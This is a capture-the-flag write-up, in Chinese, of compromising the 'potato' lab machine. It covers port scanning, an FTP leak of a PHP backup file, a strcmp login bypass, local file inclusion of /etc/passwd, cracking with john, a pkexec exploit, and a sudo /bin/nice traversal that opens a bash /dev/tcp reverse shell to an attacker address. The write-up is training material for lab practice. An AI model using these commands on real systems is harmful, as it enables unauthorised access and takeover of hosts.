实战打靶集锦-017-potato

news2024/11/26 16:28:24

提示:本文记录了博主的一次打靶过程

目录

  • 1. 主机发现
  • 2. 端口扫描
  • 3. 服务枚举
  • 4. 服务探查
    • 4.1 Apache探查
    • 4.2 ProFTPD探查
      • 4.2.1 strcmp()函数绕过
      • 4.2.2 查找apache日志文件
      • 4.2.3 查看/etc/passwd文件
      • 4.2.4 破译密码
      • 4.2.5 突破边界
  • 5. 提权
    • 5.1 系统信息枚举
    • 5.2 定时任务枚举
    • 5.3 可执行文件枚举
    • 5.4 利用/bin/nice提权
  • 6. 获取flag


1. 主机发现

目前只知道目标靶机在65.xx网段,通过如下的命令,看看这个网段上在线的主机。

$ nmap -sP 192.168.65.0/24

在这里插入图片描述
锁定靶机地址为192.168.65.136。

2. 端口扫描

通过下面的命令对靶机进行全端口扫描,看看具体开了哪些端口。

$ sudo nmap -p- 192.168.65.136

在这里插入图片描述
靶机上开的端口不多,不过有一个2112的陌生端口。

3. 服务枚举

通过下面的命令枚举一下上述端口上分别运行了什么服务。

$ sudo nmap -p22,80,2112 -A -sT -sV 192.168.65.136

在这里插入图片描述
除了之前常见的OpenSSH和Apache之外,还有个ProFTPD的服务,待会儿探查一下。

4. 服务探查

4.1 Apache探查

先用浏览器访问一下看看。
在这里插入图片描述
看来这个靶机也挺会玩儿的,啥都没有,还是枚举一下目录吧。

$ dirsearch -u http://192.168.65.136

在这里插入图片描述
枚举出来的内容不多,直接逐个看看。
在这里插入图片描述
/admin路径下是一个登录页面,我们尝试用不同的用户名密码登录一下。
在这里插入图片描述
无论输入什么样用户名密码,都会提示上述的信息。继续往下探查。
在这里插入图片描述
在/admin/logs目录下,有三个log文本文件,进去看看有没有我们感兴趣的内容。从log_01.txt中可以看到,有修改admin用户的密码的记录,如下图。
在这里插入图片描述
这说明admin用户是一定存在的,实在不行待会儿爆破一下看看。其它两个分别是admin用户重启服务和修改密码的日志;其它目录都没有发现我们感兴趣的内容。
接下来我们使用burpsuite通过登录页面爆破一下admin用户的密码,具体细节不再赘述。
在这里插入图片描述
半天才执行了几百个,效率太低了,还是用hydra试试。

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.65.136 -f http-post-form "/admin/index.php?login=1:username=^USER^&password=^PASS^:Sign In"

在这里插入图片描述
额,更加离谱,因为所有的请求都是反馈的200,外加“Bad user/password!”,而hydra以为返回200就是找到了密码,暂时放弃吧。

4.2 ProFTPD探查

先用浏览器访问一下看看(后来重启后,靶机IP地址变为了192.168.65.133)
在这里插入图片描述
额,貌似不是我们想要的内容,目录枚举一下看看。
在这里插入图片描述
好失望,竟然是空的。通过telnet访问一下2112端口试试看。

$ telnet 192.168.65.133 2112

在这里插入图片描述
还是有内容的,进一步尝试一下,密码随便输入。
在这里插入图片描述
接下来简单设置一下。
在这里插入图片描述
说明:TYPE命令用于设置数据类型,A=ASCII,E=EBCDIC,I=binary。这里参照了CSDN上面的一篇文章(https://blog.csdn.net/huabiaochen/article/details/90731372)。
看看当前目录是啥,以及当前目录下有些啥。
在这里插入图片描述
这说明,当前的/目录就是根目录,下面只有两个文件,我们尝试把两个文件下载到本地。
在这里插入图片描述
发现无论怎么尝试,都无法将文件下载到本地。怀疑可能是用telnet连接的原因,切换到ftp命令试试看。

$ ftp 192.168.65.133 2112

在这里插入图片描述
这次可以顺利下载到本地了,估计开始传输的参数或者模式上面有些差异。接下来看看这两个文件里面分别是些啥。
在这里插入图片描述
welcome.msg文件中定义的是用户登录FTP后的一个欢迎信息的格式,从我们前面的登录能够看出来,再看看index.php.bak文件。
在这里插入图片描述
这个文件有意思,首先貌似有个默认密码是potato,另外给出了登录的逻辑。我们先试试默认密码。
在这里插入图片描述
额,尝试失败,但是依照靶机的尿性,既然给出了这个index.php.bak文件,相当于是告诉了我们登录认证的逻辑,一定是有用的,我们再回来研究一下这段代码,得想办法看看怎么让strcmp的结果恒等于0。

4.2.1 strcmp()函数绕过

直接google一下吧。
在这里插入图片描述
貌似这里有些可以利用的内容,直接搜索php strcmp bypass看看,还真找到了一篇文章(https://blog.0daylabs.com/2015/09/21/csaw-web-200-write-up/)。貌似是说,strcmp()函数在比较的时候,如果让passwd为类似于password[]=lol的形式时,输入的密码变量就是一个数组,这个时候如果执行比较的时候,不是报错,而是返回NULL,并且在php中NULL==0,因此相当于strcmp函数返回结果为0(即密码正确),这样就达到了绕过strcmp函数的目的。
在这里插入图片描述
接下来我们在密码输入框中直接输入password[]=lol试试看。
在这里插入图片描述
额,仍然是失败的,再修改一下密码为password[]=””试试看,还是失败的,怀疑还是直接输入的时候导致有些编码的问题,直接通过burp试试。
在这里插入图片描述
从下面的响应结果来看是成功的,看来确实是之前用浏览器会有些小问题。
在这里插入图片描述
这就好办了,打开burp的拦截功能,然后拦截登录请求,修改密码提交部分,然后转发给服务器,我们就可以得到正常的登录成功的响应。
在这里插入图片描述
接下来,我们逐个界面点一下看看。经过查看,最有可能有问题的地方是Logs下面,选择某个log文件的时候,会显示log内容,这里有可能是本地文件包含漏洞。

在这里插入图片描述
我们通过burp的Repeater下修改请求消息中的文件名,试试看。
在这里插入图片描述
按照上图所示进行修改,然后请求一下试试看。
在这里插入图片描述
确实返回了/etc/passwd的内容,再更换一个请求试试看。
在这里插入图片描述
妥妥的,还记得我们前段时间的第14个打靶实战吗?通过往apache的log文件中写入日志实现了反弹shell,这里我们用同样的手法试一下。

4.2.2 查找apache日志文件

直接分别试一下/var/log/apache/access.log、/var/log/apache2/access.log、/etc/httpd/logs/access_log,结果都不对。
在这里插入图片描述

4.2.3 查看/etc/passwd文件

到目前位置,没什么进展,我们再回过头来看看/etc/passwd文件,看看有没有什么值得研究的内容。
在这里插入图片描述
从passwd文件中可以看出,root、florianges、webadmin这三个用户都是可以通过ssh登录的,尤其是webadmin账号,还给出了密码串。我们先尝试一下弱密码登录三个账号试试,然后尝试解析webadmin的密码串。
在这里插入图片描述
无论怎么请求,都是返回上图所示的信息,感觉没有办法直接登录。通过下面的命令删除本地当前用户的.ssh目录下的所有内容。

$ rm -rf ~/.ssh/*

然后再试一下。
在这里插入图片描述
嗯,这次可以了,通过弱密码试试这三个用户,都是徒劳的,现在看看怎么把webadmin用户在/etc/passwd文件中的密文串给解析一下,再不行就只能爆破了。

4.2.4 破译密码

仔细看passwd文件中的密码位置的内容$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/,感觉真正加密的内容是最后一个$后面的内容,通过上网查询(https://3gstudent.github.io/Linux%E4%B8%8B%E7%9A%84%E5%AF%86%E7%A0%81Hash-%E5%8A%A0%E5%AF%86%E6%96%B9%E5%BC%8F%E4%B8%8E%E7%A0%B4%E8%A7%A3%E6%96%B9%E6%B3%95%E7%9A%84%E6%8A%80%E6%9C%AF%E6%95%B4%E7%90%86)得知前面的$1是用来指定密码的加密算法的,$1代表MD5$5代表SHA-256$6代表SHA-512,而第二个$后面的webadmin应该是salt值。
既然已经明确了规则,接下来就是想办法破译密码了,先用上面文章中大牛提到的john试试看。

$ echo '$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/' > webadmin_pass
$ john --wordlist=/usr/share/wordlists/rockyou.txt webadmin_pass

在这里插入图片描述
额,这是直接爆出密码了吗?有些惊喜啊,试试看。

4.2.5 突破边界

在这里插入图片描述
我去,真的登录进去了,john太牛逼了。

5. 提权

5.1 系统信息枚举

在这里插入图片描述这是64位的Ubuntu 20.04 LTS版本,内核版本是5.4.0-42-generic。

5.2 定时任务枚举

在这里插入图片描述
没有可用的定时任务。

5.3 可执行文件枚举

先查一下root用户拥有的,其它用户可读可写的文件。

$ find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"

在这里插入图片描述
只有一个nc,这是个很有用的玩意儿,再查一下具有SUID的文件看看。

$ find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述
搜索出来的内容还是挺多的,不过可疑的不多,主要就是我们之前经常遇到的pkexec。先查一下版本号。

$ dpkg -l policykit-1

在这里插入图片描述
嗯,这个版本可能是有漏洞的,在Ubuntu 20.04上面修复版本是policykit-1 - 0.105-26ubuntu1.2,而这里是policykit-1 - 0.105-26ubuntu1,我们尝试exploit一下,先把EXP下载到本地。

$ git clone https://github.com/Almorabea/pkexec-exploit.git

是个python脚本,看了一下文件内容,没什么大问题,直接上传到靶机运行一下。
在这里插入图片描述
啊,有些顺利的不像话,直接成功了,我们深入确认一下。

在这里插入图片描述
看来确实提权成功了。

5.4 利用/bin/nice提权

先通过sudo -l查看一下。
在这里插入图片描述
意思是webadmin用户可以执行/bin/nice命令,而这个命令的权限非常高。不过没太看懂啥意思,直接执行一下上面的命令试试看。
在这里插入图片描述
貌似也没有提权啊,莫非*那里用什么样的内容也可以?在这里构建一个反弹shell试试看。

$ whereis bash
$ sudo /bin/nice /notes/../usr/bin/bash -i >& /dev/tcp/192.168.65.202/8888 0>&1

在这里插入图片描述
反弹shell建立成功,简单验证一下。
在这里插入图片描述
提权成功。

6. 获取flag

在这里插入图片描述
搞定。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/475388.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

基于Yolov5的NEU-DET钢材表面缺陷检测,优化组合新颖程度较高:CVPR2023 DCNV3和InceptionNeXt,涨点明显

1.钢铁缺陷数据集介绍 NEU-DET钢材表面缺陷共有六大类,分别为:crazing,inclusion,patches,pitted_surface,rolled-in_scale,scratches 每个类别分布为: 训练结果如下: 2.基于yolov5s的训练 map值: 2.1 Inception-MetaNeXtStage 对应博客:https://cv2023.blog.csdn.n…

实验5 彩色图像处理与图像变换

文章目录 一、实验目的二、实验内容1. 彩色图像平滑。(课本P310 例6.12)2. 彩色边缘检测。(课本P318 例6.16)3. 一维小波变换。(课本P364 例7.20)4. 二维小波变换。(课本P369 例7.22)5. 小波包分解。(课本P376 例7.24) 一、实验目的 掌握RGB彩色模型和HSI彩色模型之间的转换方…

C语言指针的使用

文章目录 前言一、指针基本概念介绍二、指针的大小三、使用指针访问变量和变量地址四、使用指针遍历数组总结 前言 一、指针基本概念介绍 在 C 语言中,指针是一种用于存储内存地址的数据类型。指针可以存储任何数据类型的内存地址,包括基本数据类型、数…

C语言之单链表的实现以及链表的介绍

一、为什么会存在链表 因为我们常用的顺序表会存在以下的一些问题: 1. 中间/头部的插入删除,时间复杂度为O(N) 2. 增容需要申请新空间,拷贝数据,释放旧空间。会有不小的消耗。 3. 增容一般是呈2倍的增长,势必会有一定…

算法的特性和空间复杂度---数据结构

目录 前言: 1.算法 1.1算法的特性 1.2设计算法 2.空间复杂度 3.学习复杂度的意义 ❤博主CSDN:啊苏要学习 ▶专栏分类:数据结构◀ 学习数据结构是一件有趣的事情,希望读者能在我的博文切实感受到数据之间存在的关系&#xff…

【3dmax】常用的快捷键总结以及如何修改快捷键

💗 未来的游戏开发程序媛,现在的努力学习菜鸡 💦本专栏是我关于建模的笔记 🈶本篇是3dmax常用的快捷键总结以及如何修改快捷键 3dmax常用的快捷键总结以及如何修改快捷键 3dmax常用快捷键如何添加或修改快捷键 3dmax常用快捷键 视…

go pprof性能调优工具

go pprof 一、性能调优原则二、pprof1、pprof 功能简介2、pprof 排查实战前置工作a、CPUb、Heapc、goroutined、mutexe、block 3、pprof 的采样过程和原理a、cpub、heapc、goroutine && threadCreated、block && mutex 三、调优流程1、业务优化a、流程 2、基础…

2023.4.17-4.23 AI行业周刊(第146期):创业要趁早

最近有很多外部拓展培训的需求,联盟的共学课程培训,公司视觉软件的培训,行业课程的培训,每一项培训听起来简单,但是其实都需要大量的时间精力。 前两年也准备过一份《30天入门人工智能》的视频课程,总共31…

Ansible自动化部署工具|各个模块的使用

Ansible自动化部署工具|各个模块的使用 一、自动化运维工具—Ansible二、安装Ansible查询webserver组中主机的日期 三 Ansible常用模块(1) ansible命令行模块(2) command模块(3) shell模块(4) cron模块(5) user模块(6) grup模块(7) copy模块(8) file模块(9) ping模块(10) servi…

内网穿透NPS和宝塔Nginx配合使用,开启SSL访问本地局域网网络

并非为了教学,仅供自己记录,方便下次用。所以内容不会刻意花时间写的很细节详细。 1. 服务器NPS配置 NPS install安装后,配置文件会在其他位置,通过是 /etc/nps/nps.conf目录。 找到进行修改,主要修改的是http_proxy_p…

【flask】三种路由和各自的比较配置文件所有的字母必须大写if __name__的作用核心对象循环引用的几种解决方式--难Flask的经典错误

三种路由 方法1:装饰器 python C#, java 都可以用这种方式 from flask import Flask app Flask(__name__)app.route(/hello) def hello():return Hello world!app.run(debugTrue)方法2: 注册路由 php python from flask import Flask app Flask(__name__)//app…

【以太坊 Solidity】管理员读写权限/访问控制/角色控制

摘要 在 Solidity 语言的多继承中,若多个合约共同继承一个父合约,则这多个合约 共享 父合约中的变量和函数。 1.测试的智能合约 合约继承路线如下: #mermaid-svg-DtimeTjOch5CJh50 {font-family:"trebuchet ms",verdana,arial,s…

应用,auto,内联函数

6.引用&#xff1a; //指针 int main() {int a 0;int& b a;int& c b;int& d c;cout << &a << endl;cout << &b << endl;cout << &c << endl;cout << &d << endl;b;d;cout << a <<…

WEB攻防通用漏洞跨域CORS资源JSONP回调域名接管劫持

目录 一、同源策略&#xff08;SOC&#xff09; 二、跨域资源&#xff08;COSP&#xff09; 三、回调跨域&#xff08;JSOP&#xff09; 四、CORS资源跨域-敏感页面原码获取 五、JSONP 回调跨域-某牙个人信息泄露 六、子域名劫持接管 一、同源策略&#xff08;SOC&#x…

C#手麻系统源码, 基于前端Winform+后端WCF +sqlserver 开发

手麻系统源码&#xff0c;自动生成电子单据 基于C# 前端框架&#xff1a;Winform后端框架&#xff1a;WCF 数据库&#xff1a;sqlserver 开发的手术室麻醉临床信息系统源码&#xff0c;应用于医院手术室、麻醉科室的计算机软件系统。该系统针对整个围术期&#xff0c;对病人…

Buffer Pool介绍

Buffer Pool基本概念 Buffer Pool&#xff1a;缓冲池&#xff0c;简称BP。其作用是用来缓存表数据与索引数据&#xff0c;减少磁盘IO操作&#xff0c;提升效率 Buffer Pool由 缓存数据页(Page) 和 对缓存数据页进行描述的控制块 组成, 控制块中存储着对应缓存页的所属的 表空…

English Learning - L3 综合练习 1 VOA-Color 2023.04.26 周三

English Learning - L3 综合练习 1 VOA-Color 2023.04.26 周三 主题整体听一遍精听句子 1扩展 way of doing | way to do sth 句子 2扩展 Expression扩展 base 句子 3句子 4扩展 red-hot 句子 5句子 6扩展 fiery 句子 7句子 8句子 9句子 10句子 11扩展 born 句子 12句子 13句子…

Haar特征和级联分类器目标检测介绍及应用

文章目录 Haar特征和级联分类器目标检测介绍及应用1. Haar特征2. 级联分类器3. 实现步骤4.尝试训练自己的级联分类器4. 应用示例 Haar特征和级联分类器目标检测介绍及应用 Haar特征和级联分类器是一种经典的目标检测算法&#xff0c;适用于检测物体在图像中的位置、大小和姿态…

卷积神经网络算法解读

神经网络算法解读 机器学习流程&#xff1a; 数据获取特征工程建立模型评估与应用 图像数据是一个矩阵300 * 100 * 3 线性函数分类方法&#xff1a;分类&#xff08;wxb线性回归&#xff09; 损失函数&#xff1a;预测值与实际值之间的差异值 softmax分类器&#xff1a; 神…

(Python)Jupyter Notebook无法运行代码,且提示error和自动保存失败时如何操作?无法链接内核?

目录 一、报错情形 1、运行代码时跳转下一行&#xff0c;无法执行代码。 2、在修改文件名是提示失败&#xff0c;出现“error”字样。 二、深层原因 三、解决方案 四.建议使用原环境 Anaconda的Jupyter Notebook作为优秀的网页编辑器&#xff0c;非常适用于编写Python程序…